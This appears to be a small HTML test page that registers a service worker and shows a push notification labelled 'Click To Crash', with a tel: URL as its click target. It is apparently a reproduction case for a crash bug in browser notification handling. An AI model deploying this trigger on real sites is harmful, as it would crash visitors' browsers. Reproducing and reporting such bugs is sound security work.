<!DOCTYPE html>
<html>
    <head>
        <title>Push-Crash Test</title>
    </head>
    <body>
        Push-URL (onclick):
        <input type="text" id="pushUrl" value="tel:0170123456789" />

        <br/>
        <button onclick="sendPush();">SendPush</button>
    </body>
    <script>

        async function sendPush() 
        {
            await navigator.serviceWorker.register("sw.js");
            const workerRegistration = await navigator.serviceWorker.getRegistrations();

            await workerRegistration[0].pushManager.subscribe({
                userVisibleOnly: true,
                applicationServerKey: urlB64ToUint8Array("BB6jwIBdLh2c4S5ZUszTFpJba_tvyxGmi2W0bgp4Gbv-be6eMgul71PdBll8vz8OfJ1NEznz9VN0ijCWY0CCyZ8")
            });

            await workerRegistration[0].showNotification("Click To Crash", {
                data: {
                    url: pushUrl.value
                }
            });
        }

        function urlB64ToUint8Array(base64String) {
            const padding = '='.repeat((4 - (base64String.length % 4)) % 4);
            const base64 = (base64String + padding)
            .replace(/\-/g, '+')
            .replace(/_/g, '/');

            const rawData = window.atob(base64);
            const outputArray = new Uint8Array(rawData.length);

            for (let i = 0; i < rawData.length; ++i) {
            outputArray[i] = rawData.charCodeAt(i);
            }
            return outputArray;
        }

    </script>
</html>